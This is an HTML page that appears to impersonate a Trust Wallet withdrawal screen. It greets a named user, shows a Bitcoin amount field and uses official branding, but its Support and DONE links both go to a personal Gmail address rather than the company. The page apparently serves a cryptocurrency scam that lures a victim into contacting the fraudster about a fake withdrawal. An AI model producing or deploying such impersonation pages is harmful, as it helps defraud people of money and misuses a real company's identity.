<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Trust Wallet - Withdraw</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <header>

<nav>
<div class="logo">
<strong>Hi, Judith</strong>
</div>
<div class="menu">
    <a href="https://trustwallet.com/about-us"><b>About</b></a>
    <a href="mailto:trustwalletmetatraderbridge@gmail.com"><b>Support</b></a>   
</div>
<div class="register">
    <a href=""><b>Withdraw</b></a>
    <a href=""><b><img src="New folder/Flag_of_the_United_Kingdom_(1-2).svg.png" width="40px"></b></a>
</div>
</nav>

<section class="btc">
    <p><img src="New folder/Bitcoin.svg.png" width="50px"></p>
        <br> 
        <form action="" method="post">
            <div>
                <label for="numbentry"><h2>Input Amount</h2></label>
                <input type="number" name="numbentry" id="numbentry" autofocus>
            </div>
                <a href="mailto:trustwalletmetatraderbridge@gmail.com"><b>DONE</b></a>
        </form>
    <img src="Trust-Wallet-New-Logo.png" width="500px" alt="">
</section>


   



    </header>
</body>
</html>